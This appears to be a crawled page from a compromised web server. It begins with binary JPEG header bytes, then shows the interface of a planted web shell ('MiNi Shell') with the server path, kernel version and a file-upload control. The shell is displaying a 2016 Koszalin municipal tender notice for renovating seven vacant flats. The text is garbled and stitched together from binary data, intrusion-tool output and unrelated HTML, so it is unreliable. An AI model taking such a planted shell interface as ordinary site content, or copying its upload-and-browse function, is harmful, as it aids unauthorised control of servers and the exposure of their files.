JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160512/120072-N-2016.html

<p class="kh_header"><b>Koszalin: Remont 7 pustostanów</b><br>
<b>Numer ogłoszenia: 120072 - 2016; data zamieszczenia: 12.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin Zarząd Budynków Mieszkalnych , ul. Połczyńska 24, 75-815 Koszalin, woj. zachodniopomorskie, tel. 094 3409106, 3409107, faks 094 3409196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ZBM.KOSZALIN.IBIP.PL</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont 7 pustostanów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont 7 pustostanów położonych w Koszalinie.

Zamawiający podzielił zamówienie na 3 części:
Część nr 1: obejmuje remont 3 pustostanów położonych w Koszalinie przy ul. Zwycięstwa 53/7, ul. Andersa 15/5 i ul. Pileckiego 17/12,

Część nr 2: obejmuje remont 2 pustostanów położonych w Koszalinie przy ul. Wróblewskiego 15/5 i ul. Harcerskiej 14/4a,

Część nr 3: obejmuje remont 2 pustostanów położonych w Koszalinie przy ul. Lechickiej 3/1b i ul. Spółdzielczej 19/1..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.30.00.00-0, 45.31.10.00-0, 45.33.00.00-9, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest wnieść, przed upływem terminu składania ofert, wadium w wysokości:
1) na część nr 1 - 1.000,00 zł,
2) na część nr 2 - 1.000,00 zł,
3) na częśc nr 3 -    800,00 zł

Uwaga!
Wykonawca zobowiązany jest wskazać nr części na którą wnoszone jest wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę   winien wykazać, że:  
dla części 1 lub części 2 :
     w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną  robotę budowlaną  polegającą na budowie lub przebudowie lub remoncie budynków lub lokali o wartości nie mniejszej niż 30.000 zł obejmującą swoim zakresem wymianę instalacji sanitarnych i elektrycznych

dla części 3:
     w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną  robotę budowlaną  polegającą na budowie lub przebudowie lub remoncie budynków lub lokali o wartości nie mniejszej niż 20.000 obejmującą swoim zakresem wymianę instalacji sanitarnych i elektrycznych



UWAGA!
1) Wykonawca składający ofertę na więcej niż jedną część zamówienia winien wykazać, że wykonał łącznie po jednej robocie z każdej z części, na które składa ofertę o wartości odpowiadającej każdej części zamówienia, np. składając ofertę na część 1 i 3 Wykonawca winien wykazać, że wykonał łącznie 2 roboty budowlane  polegające na budowie lub przebudowie lub remoncie budynków lub lokali o wartości nie mniejszej niż 50.000 obejmujące swoim zakresem wymianę instalacji sanitarnych i elektrycznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - okres gwarancji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawiera projekt umowy stanowiący załącznik do niniejszej specyfikacji.

2. Zakres i warunki zmian związanych z umową zostały określone we wzorze umowy stanowiącej załącznik do niniejszej specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zbm.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> zbm.koszalin.ibip.pl lub odebrać w siedzibie Zamawiającego: Zarząd Budynków Mieszkalnych ul. Połczyńska 24, 75-815 Koszalin, pokój nr 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2016 godzina 09:55, miejsce: oferty należy złożyć w siedzibie Zamawiającego: Zarząd Budynków Mieszkalnych ul. Połczyńska 24, 75-815 Koszalin, pokój nr 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1: obejmuje remont 3 pustostanów położonych w Koszalinie przy ul. Zwycięstwa 53/7, ul. Andersa 15/5 i ul. Pileckiego 17/12,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje m.in. 

1.1. pustostan przy ul. Zwycięstwa 53/7:
1.1.1. roboty remontowe i renowacyjne, w tym:
wymiana progów drzwiowych,
cyklinowanie posadzek,
lakierowanie posadzek,
wymiana ościeżnic drewnianych na stalowe,
montaż skrzydeł drzwiowych wewnętrznych wejściowych,
usunięcie zacieków i wykwitów na ścianach,
malowanie farbami emulsyjnymi,
malowanie grzejników, rur wodociągowych i gazowych farbą olejną, 

1.1.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
demontaż rurociągów stalowych instalacji gazowej z zaślepieniem,
wymiana ustepu z miska porcelanowa Kompakt,
wymiana podejścia z rur PCW o śred. 110 mm,
wykonanie podejścia pod wodomierz O 15 mm,
montaż wodomierza skrzydełkowego  O 15 mm,
zakup, dostawa i montaż elektrycznego podgrzewacza wody.

1.1.3. roboty instalacyjne elektryczne, w tym:
wykucie bruzd dla przewodów wtynkowych,
ułożenie przewodów,
montaż złączy 2- i 3-biegunowych,
montaż gniazd wtyczkowych 2 -biegunowych z uziemieniem,,
montaż łączników podtynkowych jednobiegunowych i świecznikowych,
montaż dzwonka 230 V,
montaż tablicy TM (1x12),
sprawdzenie i pomiar obwodu NN 1-fazowego,
próba działania wyłącznika różnicoprądowego,
badania i pomiary skuteczności zerowania,

1.2. pustostan przy ul. Andersa 15/5:
1.2.1. roboty remontowe i renowacyjne, w tym:
wymiana posadzek z tworzyw sztucznych rulonowych,
wymiana progów drzwiowych,
wymiana stolarki okiennej,
wymiana podokienników,
wymiana ościeżnic drewnianych na stalowe,
montaż stolarki drzwiowej,
malowanie farbami emulsyjnymi, 
malowanie farbami olejnymi,

1.2.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
wymiana kratek wentylacyjnych,
wykonanie podejścia do gazomierza wraz z konsolą gazomierzową,
wymiana pieca gazowego jednofunkcyjnego,
wykonanie podejścia pod wodomierz O 15 mm,
montaż wodomierza skrzydełkowego  O 15 mm,
wymiana zlewozmywaka stalowego emaliowanego, wraz z syfonem i baterią ścienną,

1.2.3. roboty instalacyjne elektryczne, w tym:
wykucie bruzd dla przewodów wtynkowych,
ułożenie przewodów,
montaż złączy 2- i 3-biegunowych,
montaż gniazd wtyczkowych 2 -biegunowych z uziemieniem,
montaż łączników podtynkowych jednobiegunowych i świecznikowych,
montaż dzwonka 230 V,
montaż tablicy TM (1x12),
sprawdzenie i pomiar obwodu NN 1-fazowego,
próba działania wyłącznika różnicoprądowego,
badania i pomiary skuteczności zerowania,

1.3. pustostan przy ul. Pileckiego 17/12:
1.3.1. roboty remontowe i renowacyjne, w tym:
wymiana posadzek z tworzyw sztucznych rulonowych,
wymiana progów drzwiowych,
wymiana stolarki okiennej,
wymiana podokienników,
wymiana ościeżnic drewnianych na stalowe,
montaż stolarki drzwiowej,
malowanie farbami emulsyjnymi, 
malowanie farbami olejnymi,
odgrzybianie metoda opryskiwania,

1.3.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
wymiana kratek wentylacyjnych o wym. 14x21 cm,
wykonanie podejścia do gazomierza wraz z konsolą gazomierzową,
montaż i regulacja kuchni gazowej z piekarnikiem,
wykonanie próby ciśnieniowej instalacji gazowej, 
wykonanie podejścia pod wodomierz O 15 mm,
montaż wodomierza skrzydełkowego  O 15 mm,
wymiana zlewozmywaka blaszanego emaliowanego wraz z syfonem,
wymiana podgrzewacza wody z wylewką,
wymiana ustępu porcelanowego z miską porcelanową Kompakt,
przestawienie pieca licowanego,

1.3.3. roboty instalacyjne elektryczne, w tym:
montaż złączy 2- i 3-biegunowych,
montaż gniazd wtyczkowych 2 -biegunowych z uziemieniem,
montaż łączników podtynkowych jednobiegunowych i świecznikowych,
sprawdzenie i pomiar obwodu NN 1-fazowego,
próba działania wyłącznika różnicoprądowego,
badania i pomiary skuteczności zerowania,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.30.00.00-0, 45.31.10.00-0, 45.33.00.00-9, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. okres gwarancji - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont 2 pustostanów położonych w Koszalinie przy ul. Wróblewskiego 15/5 i ul. Harcerskiej 14/4a.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2:
2.1. pustostan przy ul. Wróblewskiego 15/5:
2.1.1.  roboty remontowe i renowacyjne, w tym:
wymiana posadzek z tworzyw sztucznych rulonowych,
wymiana progów drzwiowych,
wymiana stolarki okiennej (wymiana szyby),
wymiana ościeżnic drewnianych na stalowe,
montaż stolarki drzwiowej,
malowanie farbami emulsyjnymi, 
malowanie farbami olejnymi,
przestawienie  pieców licowanych kaflami kwadratowymi,

2.1.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
wymiana kratek wentylacyjnych o wym. 14x21 cm,
wykonanie podejścia do gazomierza - montaż konsoli gazomierzowej,
montaż kuchni gazowej 4-palnikowej z piekarnikiem,
montaż pieca gazowego jednofunkcyjnego,
próba ciśnieniowa instalacji gazowej,
wymiana zlewozmywaka stalowego emaliowanego wraz z syfonem i baterią ścienną,
wymiana wodomierza 15 mm,
wymiana ustępu z miską porcelanową Kompakt,
wymiana wanny stalowej blaszanej emaliowanej wraz z baterią z natryskiem,
wymiana umywalki fajansowej z syfonem, baterią i szafką,

2.1.3. roboty instalacyjne elektryczne, w tym:
wykucie bruzd pod przewody wtynkowe,
ułożenie przewodów wtynkowych,
montaż złączy 2- i 3-biegunowych,
montaż gniazd wtykowych podtynkowych z uziemieniem,,
montaż łączników podtynkowych,
montaż dzwonka 230 V,
montaż tablicy rozdzielczej TM (1x12),
sprawdzenie i pomiar obwodu NN 1-fazowego,
próba działania wyłącznika różnicoprądowego,
badania i pomiary skuteczności zerowania.

2.2. pustostan przy ul. Harcerskiej 14/4a:
2.2.1. roboty remontowe i renowacyjne, w tym:
gruntowanie preparatem wzmacniającym,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi,
wymiana okuć drzwiowych,
wymiana legarów,
przybicie płyt OSB,
wymiana posadzki z tworzyw sztucznych,
demontaż karniszy,
powiększenie otworów drzwiowych i okiennych
wymiana progów drzwiowych,

2.2.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
wymiana kratek wentylacyjnych o wym. 14x21 cm,
wykonanie podejścia do gazomierza - montaz konsoli gazomierzowej,
wymiana kuchni gazowej z piekarnikiem elektrycznym wraz z regulacją,
wykonanie próby ciśnieniowej instalacji gazowej, 
zakup z dostawą i montażem elektrycznego podgrzewacza wody z wylewką,
wymiana zlewozmywaka blaszanego emaliowanego wraz z syfonem,
2.2.3. roboty instalacyjne elektryczne, w tym:
wykucie bruzd pod przewody
układanie przewodów,
montaż złączy 2- i 3-biegunowych
montaż gniazd wtyczkowych podtynkowych,
montaż łączników podtynkowych  jednobiegunowych i świecznikowych,
montaż dzwonka 230 V,
montaż tablicy TM (1x12),
sprawdzenie i pomiar obwodu NN 1-fazowego,
badania i pomiary skuteczności zerowania,
próba działania wyłącznika różnicoprądowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.30.00.00-0, 45.31.10.00-0, 45.33.00.00-9, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. okres gwarancji - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont 2 pustostanów położonych w Koszalinie przy ul. Lechickiej 3/1b i ul. Spółdzielczej 19/1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 3:
3.1. pustostan przy ul. Lechickiej 3/1B:
3.1.1. roboty remontowe i renowacyjne, w tym:
zeskrobanie i zmycie starej farby, 
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi,
wymiana okuć drzwiowych,
wymiana posadzek z tworzyw sztucznych,
montaż nawiewników w skrzydłach okiennych,
wymiana progów drzwiowych,
uzupełnienie tynków wewnętrznych,

3.1.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
wymiana kratek wentylacyjnych o wym. 14x21 cm,
obsadzenie kratek wentylacyjnych fi 150 mm,
wymiana zlewozmywaka wraz z syfonem i baterią,
wymiana bojlera 100 dm3 na 80 dm3,
wykonanie podejścia pod wodomierz 15 mm wraz z montażem wodomierza,
wymiana wanny stalowej blaszanej emaliowanej,
wymiana baterii wannowej ściennej,
wymiana ustepu z miska porcelanowa Kompakt,
zakup i dostawa kuchenki 2-płytowej elektrycznej,

3.1.3. roboty instalacyjne elektryczne, w tym:
montaż złączy 2- i 3-biegunowych,
montaż gniazd wtyczkowych 2-biegunowych,
montaż łączników podtynkowych,
montaż dzwonka 230 V,
montaż grzejnika elektrycznego,
sprawdzenie i pomiar obwodu NN 1-fazowego,
próba działania wyłącznika różnicoprądowego,
badania i pomiary skuteczności zerowania.

3.2. pustostan przy ul. Spółdzielczej 19/1:
3.2.1. roboty remontowe i renowacyjne, w tym:
zeskrobanie i zmycie starej farby,
uzupełnienie tynków wewnętrznych,
malowanie farbami emulsyjnymi,
wymiana stolarki okiennej,
wymiana podokienników,
wymiana posadzek z tworzyw sztucznych,
wymiana ościeżnic,
obsadzenie skrzydeł drzwiowych wewnątrzlokalowych,
montaż okuć drzwiowych,
wymiana progów drzwiowych,

3.2.2. roboty instalacyjne wodno-kanalizacyjne i sanitarne, w tym:
wymiana kratek wentylacyjnych o wym. 14x21cm,
demontaż rurociągów stalowych instalacji gazowej,
przestawienie pieców licowanych,
wymiana zlewozmywaka,
wymiana ustępu z miską porcelanową Kompakt,
wykonanie podejścia pod wodomierz 15 mm wraz z montażem wodomierzy,
zakup i montaż elektrycznego podgrzewacza wody z wylewką,

3.2.3. roboty instalacyjne elektryczne, w tym:
wykucie bruzd,
układanie pod tynkiem przewodów,
montaż złączy 2- i 3-biegunowych,
montaż gniazd wtyczkowych 2-biegunowych,
montaż łączników podtynkowych,
montaż dzwonka 230 V,
montaż grzejnika elektrycznego do 1kW 230 V,
montaż tablicy TM (1x12) ,
sprawdzenie i pomiar obwodu NN 1-fazowego,
próba działania wyłącznika różnicoprądowego,
badania i pomiary skuteczności zerowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.30.00.00-0, 45.31.10.00-0, 45.33.00.00-9, 45.40.00.00-1.</p></li>
